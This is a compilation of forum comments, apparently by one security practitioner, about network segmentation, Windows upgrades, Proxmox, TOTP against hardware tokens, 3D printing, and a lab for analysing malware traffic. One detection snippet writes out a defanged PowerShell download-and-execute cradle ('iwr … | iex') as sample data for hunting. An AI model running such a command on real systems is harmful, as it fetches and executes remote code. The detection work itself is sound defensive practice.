Can we follow this up by murdering most of the generic Top Level Domains (gTLD)? I have yet to see anything except spam and malware coming out of the .top domain.
Ya, absolutely. My point was that we shouldn’t assume that vendors are doing things right all the time. So, it’s important to have those layered defenses, because vendors do stupid stuff like this.
This is a good example of why a zero trust network architecture is important. This attack would require the attacker to be able to SSH to the management interface of the device. Done right, that interface will be on a VLAN which has very limited access (e.g. specific IPs or a jumphost). While that isn’t an impossible hurdle for an attacker to overcome, it’s significantly harder than just popping any box on the network. People make mistakes all the time, and someone on your network is going to fall for a phishing attack or malicious redirect or any number of things. Having that extra layer, before they pop the firewall, gives defenders that much more time to notice, find and evict the attacker.
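As a rough sanity check of that kind of segmentation (a minimal sketch; the management address below is purely hypothetical), you can confirm from a box that should *not* have access that SSH to the management interface really is filtered:

```python
# Minimal sketch: run from a host that should NOT be allowed to reach the
# management VLAN. If the connection succeeds, the ACL/jumphost restriction
# isn't doing its job. The address below is a hypothetical example.
import socket

MGMT_IP = "10.10.99.1"  # hypothetical management interface address
SSH_PORT = 22

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
try:
    sock.connect((MGMT_IP, SSH_PORT))
    print("WARNING: management SSH is reachable from this host")
except OSError:
    print("Management SSH not reachable from here (expected)")
finally:
    sock.close()
```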
Also, Whiskey, Tango, Foxtrot Cisco?
This article brought to you by the manufacturers of the interceptor missiles.
If we were actually in a hot war or expecting one very soon, yes, we would want to ramp production like the US did during WWII. Right now, we shouldn’t be taking on the excessive costs of wartime production. It’s always best to remember Eisenhower’s words:
Every gun that is made, every warship launched, every rocket fired signifies, in the final sense, a theft from those who hunger and are not fed, those who are cold and are not clothed. This world in arms is not spending money alone. It is spending the sweat of its laborers, the genius of its scientists, the hopes of its children. The cost of one modern heavy bomber is this: a modern brick school in more than 30 cities. It is two electric power plants, each serving a town of 60,000 population. It is two fine, fully equipped hospitals. It is some fifty miles of concrete pavement. We pay for a single fighter with a half-million bushels of wheat. We pay for a single destroyer with new homes that could have housed more than 8,000 people. . . . This is not a way of life at all, in any true sense. Under the cloud of threatening war, it is humanity hanging from a cross of iron.
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an `Invoke-WebRequest` piping the download into an `Invoke-Expression` (usually the shorter `iex` alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
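If you want to hunt for it, the pattern is easy enough to match on process-creation telemetry. A minimal sketch (the field names are roughly Sysmon-style and purely illustrative, not tied to any particular EDR product):

```python
# Hedged sketch: flag process-creation events matching the pattern described
# above (explorer.exe spawning powershell.exe with an IWR | IEX download cradle).
import re

# Command line contains Invoke-WebRequest/iwr followed by Invoke-Expression/iex.
SUSPICIOUS = re.compile(r"(invoke-webrequest|\biwr\b).*(invoke-expression|\biex\b)", re.IGNORECASE)

def looks_like_download_cradle(event: dict) -> bool:
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    return (
        parent.endswith("\\explorer.exe")
        and image.endswith("\\powershell.exe")
        and bool(SUSPICIOUS.search(cmdline))
    )

# Hypothetical event, defanged:
evt = {
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": 'powershell -nop -w hidden -c "iwr http://example.invalid/x | iex"',
}
print(looks_like_download_cradle(evt))  # True
```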
Ya, in fairness to MS, Windows XP was a good release (post SP1, like most “good” MS releases). But, the fact is that MS is going to push the latest version, regardless of how ready it is for use. MS was hot for folks to switch to Windows ME. And holy fuck was that a terrible OS. MS also did everything short of bribery to get folks to switch to Vista (anyone remember Windows Mojave?). The “upgrade, or else” mantra has always been their way. Not that I blame them too much, it does need to happen. It just sucks when the reason for the new OS is more intrusive ads and user tracking.
Many years ago, I attended a Windows XP launch event. The Microsoft presenter had the perfect line to describe how MS views this:
“Why should you upgrade to Windows XP? Because we’re going to stop supporting Windows 98!”
This was said completely unironically and with the expectation that people would just do what MS wanted them to do. That attitude hasn’t changed in the years since. Win 10 is going to be left behind. You will either upgrade or be vulnerable. Also, MS doesn’t care about the home users; they care about the businesses and the money to be had. And businesses will upgrade. They will invariably wait until the last minute and then scramble to get it done. But, whether because they actually give a shit about security or they have to comply with security frameworks (SOX, HIPAA, etc.), they will upgrade. Sure, they will insist on GPOs to disable 90% of the ads and tracking shit, but they will upgrade.
Gaming under Linux is getting better and better. With all the work Valve has put into Proton, the list of games which don’t run has been shrinking.
WeChat’s software has security issues? Color me shocked. Shocked, I tell you.
Well, not that shocked.
Also:
WeChat’s custom encryption protocol
I’ve been using Proxmox professionally for years now, and not once did I have a problem I could not fix myself.
And how many of the environments you have left behind became an unmanageable mess when the company couldn’t hire someone with your skillset? One of the downsides to this sort of DIY infrastructure is that it creates a major dependency on a specific skillset. That isn’t always bad, but it does create a risk which business continuity planning must take into account. This is why things like OpenShift or even VMWare tend to exist (and be expensive). If your wunderkind admin leaves for greener pastures, your infrastructure isn’t at risk just because you cannot hire another one. The major, paid-for options tend to have support you can reach out to, and you are more likely to find admins who can maintain them. It sucks, because it means that the big products stay big, because they are big. But, the reality of a business is that continuity in the face of staff turnover is worth the licensing costs.
This line, from the OP’s post, is kind of telling as to why many businesses choose not to run Proxmox in production:
It is just KVM libvirt/qemu and corosync along with some other stuff like ZFS.
Sure, none of those technologies are magic; but, when one of them decides to fuck off for the day, if your admin isn’t really knowledgeable about all of them and how they interact, the business is looking at serious downtime. Hell, my current employer is facing this right now with a Graylog infrastructure. Someone set it up a lot of years ago, and it worked quite well. That person left the company and no one else had the knowledge, skills or time to maintain it. Now that my team (Security) is actually asking questions about the logs it’s supposed to provide, we realize that the neglect is causing problems and no one knows what to do with it. Our solution? Ya, we’re moving all of that logging into Splunk. And boy howdy is that going to cost a lot. But, it means that we actually have the logs we need, when we need them (Security tends to be pissy about that sort of thing). And we’re not reliant on always having someone with Graylog knowledge. Sure, we always need someone with Splunk knowledge. But, that’s a much easier ask. Splunk admins are much more common and probably cheaper. We’re also a large enough customer that we have a dedicated rep from Splunk whom we can email with a “halp, it fell over and we can’t get it up” and have Splunk engineers on the line in short order. That alone is worth the cost.
It’s not that I don’t think that Proxmox or Open Source Software (OSS) has a place in an enterprise environment. One of my current projects is all about Linux on the desktop (IT is so not getting the test laptop back. It’s mine now; this is what I’m going to use for work.). But, using OSS often carries special risks which the business needs to take into account. And when faced with those risks, the RoI may just not be there for using OSS. Because, when the numbers get run, having software which can be maintained by those Windows admins who are “used to click their way through things” might just be cheaper in the long run.
So ya, I agree with the OP. Proxmox is a cool option. And for some businesses, it will make financial sense to take on the risks of running a special snowflake infrastructure for VMs. But, for a lot of businesses, the risks of being very reliant on that one person who “not once [had a] problem I could not fix myself” just aren’t going to be worth taking.
What is your tolerance for tinkering? One option, which would give you a lot of control and flexibility over the printer, would be to build a Voron. It’s tough to get more “open source” than a fully open source design. The 2.4 is also a CoreXY design and should cover just about everything you want.
Pretty sure that BambuLabs misses on the requirement:
I want something as open source as possible that doesn’t phone home, and ideally not made in China.
Someone is trying to re-create the virus from Snow Crash
The Company believes the unauthorized actor exfiltrated certain encrypted internal ADT data associated with employee user accounts during the intrusion. Based on its investigation to date, the Company does not believe customers’ personal information has been exfiltrated, or that customers’ security systems have been compromised. ADT’s containment measures have resulted in some disruptions to the Company’s information systems, and the Company’s investigation is at an early stage and ongoing.
This reads a lot like a domain controller got popped. Considering that this is the second breach in a short time, and the previous one got access to customer data, I wouldn’t be surprised to find out that it’s either the same attacker, or that this breach was the work of an access broker who sold credentials to the previous attacker.
That’s just my guess, and I doubt we will ever get a sufficiently detailed write-up to know. But, it seems like a likely way for the attacks to go down.
Probably worth noting that, if you are using an employer-owned system to watch said porn, they likely have software on the endpoint which will let them see what porn you are watching, regardless of HTTPS/VPN/Tor. Depending on how much your employer cares about such things, that may or may not come back to bite you. I’ve worked at places where we regularly reported on users watching porn on work computers, and I’ve worked at places where we only reported on users getting malware while browsing porn at work. But, never assume your activity isn’t being monitored on employer-owned systems.
Aren’t they inherently less secure than a TOTP code?
They can be, depending on the types of threats you expect to face. If physical theft is an expected threat, then a hardware token runs the risk of being stolen and abused. For example, your attackers might just buy off cops to rob you and take your stuff. Having the physical device locked with a PIN/Passcode can mitigate this threat somewhat. But, that just becomes another password the attackers need to figure out.
On the other side of the coin, TOTP applications have started offering Cloud Backup options for accounts. What this demonstrates is that it’s possible to move those accounts between devices remotely. A hacked device means those codes may be exfiltrated to an attacker’s device and you will be none the wiser. Good security hygiene and device hardening can help mitigate these issues. But, it also means you need to put a lot of trust in a lot of third parties. Also, you need to be unimportant enough for an attacker to not burn a 0-day on.
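To see why the seed, rather than the phone, is the real secret, here is a minimal RFC 6238 sketch using only the Python standard library (the seed shown is a throwaway example, not a real account): whoever holds that base32 string can mint valid codes from anywhere.

```python
# Minimal TOTP (RFC 6238) sketch: possession of the base32 seed is possession
# of the second factor, which is why exfiltrating it from a backup is enough.
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    key = base64.b32decode(secret_b32.upper())
    counter = int(time.time()) // period          # 30-second time step
    msg = struct.pack(">Q", counter)
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                    # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # example seed, not a real account
```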
Ultimately, security is all about trade-offs. If you worry about physical security and don’t expect to face a threat which might compromise your phone, then a TOTP app might be a better option. If you are more worried about a hacked device being used to leak credentials, then a physical token may be a better choice. Each way you go has some ability to mitigate the risks. PIN for a physical token and device hardening for TOTP. But, neither is a silver bullet.
And, if your threat model includes someone willing and able to engage in rubber hose cryptanalysis, then you’re probably fucked anyway.
I’ve heard that in the US, the 5th amendment protects you from being forced to divulge a password, but they can physically place your finger on the finger print scanner.
Ya, it’s a weird space that you cannot be legally forced to divulge a password, except in cases where the content of the drive is a “foregone conclusion” (as defined by the US Supreme Court). But, they can absolutely collect biometric markers (including forcing a fingerprint scan).
As far as the rest of it, it seems to be happening with every filament I slice in Prusa slicer.
This just reminded me of an issue I was facing recently. I also use Prusa Slicer and was having a hell of a time with my prints. It turned out to be the “Arc Fitting” setting.
In Print Settings - Advanced - Slicing, look for the *Arc Fitting* setting. When I had it set to “Enabled: G2/3IJ” it just completely borked my prints. Just weird problems all over the place. As soon as I set that to “Disabled”, it cleaned up my prints considerably. Not sure exactly what I’m giving up there, but I do know I’m getting much better prints.
If you haven’t yet, try a cold pull and see if that helps. I personally just do a cold pull every time I change filaments. Maybe it helps, maybe it’s overkill, but I rarely have issues around clogs.
Other things to think about:
writes Nestler. “We want to hear from you when you think Reddit is making decisions that are not in your communities’ best interests. But if a protest crosses the line into harming redditors and Reddit, we’ll step in.”
Translation: We don’t really give a shit what you think. Now shut up and generate that content for us to sell to AI companies.
This could just be a really stupid format, put out by a specific application for creating PDFs, because the original authors didn’t want to pay Adobe (never attribute to malice that which can be sufficiently explained by stupidity).
Does pdfinfo give any indication of the application used to create the document? If it chokes on the Java bit up front, can you extract just the PDF from the file and look at that? You might also dig through the PDF a bit using Didier Stevens’s tools, looking for JavaScript or other indicators of PDF fuckery.
Does the file contain any other Java bytecode? If so, can you pass that through a decompiler?
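For pulling the PDF out on its own, something along these lines should do it (a quick sketch; the filenames are placeholders, and it naively assumes a single `%PDF-` header and takes everything through the last `%%EOF`):

```python
# Quick sketch: carve the embedded PDF out of a file that has other data
# (e.g. Java bytecode) prepended, so pdfinfo or pdf-parser can look at just
# the PDF portion. Filenames are placeholders.
data = open("weird_sample.bin", "rb").read()

start = data.find(b"%PDF-")   # first PDF header
end = data.rfind(b"%%EOF")    # last end-of-file marker
if start == -1 or end == -1:
    raise SystemExit("No PDF header/trailer found")

carved = data[start:end + len(b"%%EOF")]
with open("carved.pdf", "wb") as out:
    out.write(carved)

print(f"PDF starts at offset {start}; wrote {len(carved)} bytes")
```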
This is possible, but it takes a bit of setup. In my own lab, I have PolarProxy running in one Virtual Machine (VM), using QEMU/KVM. That acts as a gateway between an isolated network and a network with internet access. It runs transparent TLS break-and-inspect on port 443/tcp and captures port 80/tcp with tcpdump. It also serves DNS using Bind.
There is then the “victim” VM which is running bog standard Windows 10. The PolarProxy root cert has been added to the Trusted Roots certificate store. The Default Gateway and DNS servers are hard coded to the PolarProxy VM. Suspicious stuff is tested on this system and all network traffic is recorded on the PolarProxy system in standard pcap format for analysis.
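Once the decrypted traffic is sitting in a normal pcap, quick triage is easy. A rough sketch with scapy that just prints the HTTP request lines (the capture filename is a placeholder):

```python
# Rough sketch: list HTTP request lines from a pcap of decrypted traffic.
from scapy.all import rdpcap, TCP, Raw

for pkt in rdpcap("proxy-capture.pcap"):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        first_line = bytes(pkt[Raw].load).split(b"\r\n", 1)[0]
        if first_line.startswith((b"GET ", b"POST ", b"HEAD ")):
            print(first_line.decode(errors="replace"))
```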